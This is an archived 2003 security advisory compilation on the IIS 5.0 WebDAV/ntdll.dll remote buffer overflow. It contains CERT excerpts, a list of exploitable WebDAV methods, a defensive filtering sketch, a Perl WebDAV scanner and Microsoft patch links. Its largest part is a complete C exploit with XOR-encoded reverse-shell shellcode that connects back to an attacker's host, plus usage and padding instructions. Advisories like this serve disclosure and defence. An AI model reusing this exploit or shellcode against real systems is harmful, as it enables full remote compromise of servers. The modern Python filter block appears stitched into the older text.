18th Mar 2003 [SBWID-6073]
COMMAND
IIS remote buffer overflow due to WebDAV/ntdll.dll
SYSTEMS AFFECTED
IIS 5.0
PROBLEM
In CERT Advisory [CA-2003-09] :
http://www.cert.org/advisories/CA-2003-09.html
--snip--
IIS 5.0 includes support for WebDAV, which allows users to manipulate
files stored on a web server (RFC2518). A buffer overflow
vulnerability exists in ntdll.dll (a portion of code utilized by the
IIS WebDAV component). By sending a specially crafted request to an
IIS 5.0 server, an attacker may be able to execute arbitrary code in
the Local System security context, essentially giving the attacker
complete control of the system.
--snap--
Update (19 March 2003)
======
Brett Moore [[email protected]] adds :
Also if anyone is writing IDS or filtering systems, most of the webdav
methods can be used to exploit this.
These are some that I have found that can lead to exploitation.
LOCK
SEARCH
PROPFIND
COPY
MKCOL
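The filtering idea in the note above, sketched as an added example (not code from the advisory or from any of the posters): it flags a request when one of the listed WebDAV methods arrives with an oversized request URI. The 2048-byte ceiling, the severity labels and the sample requests are assumptions constructed for illustration; as a generalization it also reports oversized URIs on other methods at lower severity.

```python
"""Flag HTTP requests that pair a WebDAV method with an oversized URI."""
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Methods the note above lists as able to reach the ntdll.dll overflow.
REPORTED_METHODS = frozenset({"LOCK", "SEARCH", "PROPFIND", "COPY", "MKCOL"})
# Other RFC 2518 methods, watched because "most" WebDAV methods are affected.
OTHER_WEBDAV_METHODS = frozenset({"PROPPATCH", "MOVE", "UNLOCK"})
# Assumption: site-specific ceiling for a legitimate request URI, in bytes.
MAX_URI_BYTES = 2048


@dataclass
class Finding:
    method: str
    uri_bytes: int
    severity: str  # "high", "medium" or "low"
    reason: str


def inspect_request(raw: bytes, max_uri: int = MAX_URI_BYTES) -> Optional[Finding]:
    """Return a Finding for a suspicious request, or None if it looks normal."""
    # Only the request line is examined; it ends at the first LF.
    line = raw.split(b"\n", 1)[0].rstrip(b"\r")
    parts = line.split(b" ")
    if len(parts) < 2 or not parts[0]:
        return Finding("?", len(line), "low", "malformed request line")
    # Compare case-insensitively so the filter errs towards matching.
    method = parts[0].decode("latin-1").upper()
    # The URI is everything between the method and a trailing HTTP/x.y token.
    has_version = len(parts) >= 3 and parts[-1].upper().startswith(b"HTTP/")
    uri = b" ".join(parts[1:-1] if has_version else parts[1:])
    if len(uri) <= max_uri:
        return None
    if method in REPORTED_METHODS:
        return Finding(method, len(uri), "high", "oversized URI, reported WebDAV method")
    if method in OTHER_WEBDAV_METHODS:
        return Finding(method, len(uri), "medium", "oversized URI, other WebDAV method")
    return Finding(method, len(uri), "low", "oversized URI, non-WebDAV method")


def triage(requests: Iterable[bytes]) -> List[Finding]:
    """Inspect each raw request and return findings, most severe first."""
    rank = {"high": 0, "medium": 1, "low": 2}
    found = [f for f in map(inspect_request, requests) if f is not None]
    return sorted(found, key=lambda f: rank[f.severity])


# Constructed sample traffic; the filler is inert "A" bytes, not a payload.
FILL = b"A" * 3000
SAMPLES = [
    b"GET /index.html HTTP/1.0\r\nHost: www.example.test\r\n\r\n",
    b"PROPFIND /docs/ HTTP/1.1\r\nHost: www.example.test\r\n\r\n",
    b"GET /" + FILL + b" HTTP/1.0\r\n\r\n",
    b"UNLOCK /" + FILL + b" HTTP/1.1\r\n\r\n",
    b"search /" + FILL + b" HTTP/1.1\r\nHost: www.example.test\r\n\r\n",
]

if __name__ == "__main__":
    for f in triage(SAMPLES):
        print(f"{f.severity:6} {f.method:9} uri={f.uri_bytes}B  {f.reason}")
```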
-Also-
SensePost Research [http://www.sensepost.com] wrote a WebDAV scanning
tool :
> head -n 9 finder.pl
#!/bin/perl
##
## This script test for most of the methods used by WebDAV
## If the server does not complain about the method its an indication
## that WebDAV is in use..
##
## Please see http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-007.asp
## for info why this is interesting..
##
Typical output:
> perl finder.pl www.blah.co.za 80
Testing WebDAV methods [www.blah.co.za 80]
-------------------------------------
www.blah.co.za : Server type is Microsoft-IIS/5.0
Method PROPFIND seems to be allowed - WebDAV possibly in use
Method PROPPATCH seems to be allowed - WebDAV possibly in use
Method MCOL seems to be allowed - WebDAV possibly in use
Method PUT seems to be allowed - WebDAV possibly in use
Method DELETE seems to be allowed - WebDAV possibly in use
Method LOCK seems to be allowed - WebDAV possibly in use
Method UNLOCK seems to be allowed - WebDAV possibly in use
> perl finder.pl www.moreblah.com 80
Testing WebDAV methods [www.moreblah.com 80]
-------------------------------------
www.moreblah.com : Server type is Microsoft-IIS/5.0
Method PROPFIND is not allowed
Method PROPPATCH is not allowed
Method MCOL is not allowed
Method PUT is not allowed
Method DELETE is not allowed
Method LOCK is not allowed
Method UNLOCK is not allowed
#!/bin/perl
##
## This script test for most of the methods used by WebDAV
## If the server does not complain about the method its an indication
## that WebDAV is in use..
##
## Please see http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-007.asp
## for info why this is interesting..
##
## SensePost Research
## [email protected]
## 2003/3/17
## RT
$|=1;
use Socket;

@methods = ("PROPFIND","PROPPATCH","MCOL","PUT","DELETE","LOCK","UNLOCK");

if ($#ARGV<1){die "parameters: IP/dns_name port\n";}
$target=$ARGV[0];
$port=$ARGV[1];

print "Testing WebDAV methods [$target $port]\n-------------------------------------\n";

# Identify the server from the Server: header of a HEAD response
@results=sendraw2("HEAD / HTTP/1.0\r\n\r\n",$target,$port,15);
if ($#results < 1){die "15s timeout to $target on port $port\n";}

foreach $line (@results){
    if ($line =~ /Server:/){
        ($left,$right)=split(/\:/,$line);
        $right =~ s/ //g;
        print "$target : Server type is $right";
        if ($right !~ /Microsoft-IIS\/5.0/i){
            print "$target : Not a Microsoft IIS 5 box\n";
            exit(0);
        }
    }
}

# Send each method and look for a rejection in the response
foreach $method (@methods){
    @results=sendraw2("$method /test/nothere HTTP/1.0\r\n\r\n",$target,$port,15);
    if ($#results < 1){print "15s timeout to $target on port $port\n";}

    $okflag=0;
    foreach $line (@results){
        if ($line =~ /Method Not Supported/i){
            print "Method $method is not allowed\n";
            $okflag=1;
        }
        if (($line =~ /method/i) && ($line =~ /not allowed/i)){
            print "Method $method is not allowed\n";
            $okflag=1;
        }
    }
    if ($okflag==0){
        print "Method $method seems to be allowed - WebDAV possibly in use\n";
    }
}

########## Sendraw-2
# Send a raw request and return the response lines, with a timeout
sub sendraw2 {
    my ($pstr,$realip,$realport,$timeout)=@_;
    my $target2 = inet_aton($realip);
    my $flagexit=0;
    $SIG{ALRM}=\&ermm;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
    alarm($timeout);
    if (connect(S,pack "SnA4x8",2,$realport,$target2)){
        alarm(0);
        my @in;
        select(S); $|=1;
        print $pstr;
        alarm($timeout);
        while(<S>){
            if ($flagexit == 1){
                close (S);
                print STDOUT "Timeout\n";
                return "Timeout";
            }
            push @in, $_;
        }
        alarm(0);
        select(STDOUT);
        close(S);
        return @in;
    } else {return "0";}
}

# SIGALRM handler: mark the timeout and close the socket
sub ermm{
    $flagexit=1;
    close (S);
}
Update (22 March 2003)
======
David Litchfield of NGSSoftware Ltd [http://www.ngssoftware.com/] adds :
The patch announced by Microsoft on the 17th March 2003 fixed a
security vulnerability in the core of the Windows 2000 operating
system. This flaw was actively being exploited through WebDAV requests
to Microsoft's Internet Information Server 5. It must be stressed that
IIS was simply the attack vector; the method or route used to actually
exploit the flaw. The problem, however, is much wider in scope than
just simply machines running IIS. Researchers at NGSSoftware have
isolated many more attack vectors including java based web servers and
other non-WebDAV related issues in IIS. Due to this, NGSSoftware urge
Windows 2000 users to apply the patch.
For a paper that examines the vulnerability in detail, please read :
http://www.ngssoftware.com/papers/ms03-007-ntdll.pdf
Update (24 March 2003)
======
Thanks to Rafael Núñez [[email protected]]
[http://www.scientech.com.ve], Senior Research Scientist :
/*******************************************************************/
/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
/* on all the others servers it was at 2,3,4, etc..sometimes */
/* you can have the force with you, and get the shell in 1 try */
/* sometimes you need to pad more than 10 times ;) */
/* the shellcode was coded by myself, it is SEH + ScanMem to */
/* find the famous offsets (GetProcAddress).. */
/* I know I code like a pig, my english sucks, and my tech too */
/* it is my first exploit..and my first shellcode..sorry :P */
/* if you have comments feel free to mail me at: */
/* mailto: [email protected] */
/* or visit us at www.coromputer.net . You can speak with us */
/* at IRC undernet channel #coromputer */
/* ok now the greetz: */
/* [El0d1e] to help me find some information about the bug :) */
/* tuck_ to support me ;) */
/* and all my friends in coromputer crew! hein les poulets! =) */
/* */
/* Tested by Rafael [RaFa] Nunez [email protected] */
/* */
/* (take off the WSAStartup, change the closesocket, change */
/* headers and it will run on linux boxes ;pPpPpP ). */
/* */
/*******************************************************************/
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#pragma comment (lib,"ws2_32")
char shellc0de[] =
"\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
"\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
"\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
"\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
"\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
"\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
"\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
"\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
"\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
"\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
"\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
"\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
"\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
"\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
"\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
"\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
"\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
"\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
"\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
"\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
"\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
"\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
"\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
"\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
"\xff\xd0"
"CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
"connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
"cmd" // don't change anything..
"\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
"\x00\x00\xe8\x77"
"\x00\x00\xf0\x77"
"\x00\x00\xe4\x77"
"\x00\x88\x3e\x04" // win2k3
"\x00\x00\xf7\xbf" // win9x =P
"\xff\xff\xff\xff";
int test_host(char *host)
{
char search[100]="";
int sock;
struct hostent *heh;
struct sockaddr_in hmm;
char buf[100] ="";
if(strlen(host)>60) {
printf("error: victim host too long.\r\n");
return 1;
}
if ((heh = gethostbyname(host))==0){
printf("error: can't resolve '%s'",host);
return 1;
}
sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host);
hmm.sin_port = htons(80);
hmm.sin_family = AF_INET;
hmm.sin_addr = *((struct in_addr *)heh->h_addr);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return 1;
}
printf("Checking WebDav on '%s' ... ",host);
if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
printf("CONNECTING_ERROR\r\n");
return 1;
}
send(sock,search,strlen(search),0);
recv(sock,buf,sizeof(buf),0);
if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')
return 0;
printf("NOT FOUND\r\n");
return 1;
}
void help(char *program)
{
printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n",program);
return;
}
void banner(void)
{
printf("\r\n\t [Crpt] ntdll.dll exploit trough WebDAV by kralor
[Crpt]\r\n");
printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}
void main(int argc, char *argv[])
{
WSADATA wsaData;
unsigned short port=0;
char *port_to_shell="", *ip1="", data[50]="";
unsigned int i,j;
unsigned int ip = 0 ;
int s, PAD=0x10;
struct hostent *he;
struct sockaddr_in crpt;
char buffer[65536] ="";
char request[80000]; // huuuh, what a mess! :)
char content[] =
"<?xml version=\"1.0\"?>\r\n"
"<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\n"
"Select \"DAV:displayname\" from scope()\r\n"
"</g:sql>\r\n"
"</g:searchrequest>\r\n";
banner();
if((argc<4)||(argc>5)) {
help(argv[0]);
return;
}
if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error starting winsock..");
return;
}
if(test_host(argv[1]))
return;
if(argc==5)
PAD+=atoi(argv[4]);
printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n",PAD,PAD);
ip = inet_addr(argv[2]); ip1 = (char*)&ip;
shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];
shellc0de[451]=ip1[3];
port = htons(atoi(argv[3]));
port_to_shell = (char *) &port;
shellc0de[446]=port_to_shell[0];
shellc0de[447]=port_to_shell[1];
// we xor the shellcode [xored by 0x95 to avoid bad chars]
__asm {
lea eax, shellc0de
add eax, 0x34
xor ecx, ecx
mov cx, 0x1b0
wah:
xor byte ptr[eax], 0x95
inc eax
loop wah
}
if ((he = gethostbyname(argv[1]))==0){
printf("error: can't resolve '%s'",argv[1]);
return;
}
crpt.sin_port = htons(80);
crpt.sin_family = AF_INET;
crpt.sin_addr = *((struct in_addr *)he->h_addr);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return;
}
printf("Connecting... ");
if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
printf("ERROR\r\n");
return;
}
// No Operation.
for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);
// fill the buffer with the shellcode
for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);
// well..it is not necessary..
for(i=0;i<2500;buffer[i]=PAD,i++);
/* we can simply put our ret in this 2 offsets.. */
//buffer[2086]=PAD;
//buffer[2085]=PAD;
buffer[sizeof(buffer)]=0x00;
memset(request,0,sizeof(request));
memset(data,0,sizeof(data));
sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
printf("CONNECTED\r\nSending evil request... ");
send(s,request,strlen(request),0);
send(s,content,strlen(content),0);
printf("SENT\r\n");
recv(s,data,sizeof(data),0);
if(data[0]!=0x00) {
printf("Server seems to be patched.\r\n");
printf("data: %s\r\n",data);
} else
printf("Now if you are lucky you will get a shell.\r\n");
closesocket(s);
return;
}
Update (26 March 2003)
======
Roman Medina [[email protected]] adds :
I wrote another exploit for the nt.dll bug some days ago. Explanation
and a little documentation is included in the source file. It compiles
in Linux/gcc without any error.
http://www.rs-labs.com/exploitsntools/rs_iis.c
-Also-
Mat [[email protected]] posts :
UUEncode
begin 644 webdav.zip
5496 bytes
SOLUTION
Windows 2000: Registry Tool for Security Patch: Unchecked buffer in
Windows component could cause web server compromise
http://www.microsoft.com/downloads/details.aspx?FamilyID=48b3a74e-a4af-41d6-bdec-1b6104648647&DisplayLang=en
Windows 2000: Active Directory Group Policy for Security Patch:
Unchecked buffer in Windows component could cause web server compr
http://www.microsoft.com/downloads/details.aspx?FamilyID=a3b109d3-6f0e-4b1c-a723-976566fc1b53&DisplayLang=en
Windows 2000 Security Patch: IIS Remote Exploit from ntdll.dll
vulnerability
http://www.microsoft.com/downloads/details.aspx?FamilyID=c9a38d45-5145-4844-b62e-c69d32ac929b&DisplayLang=en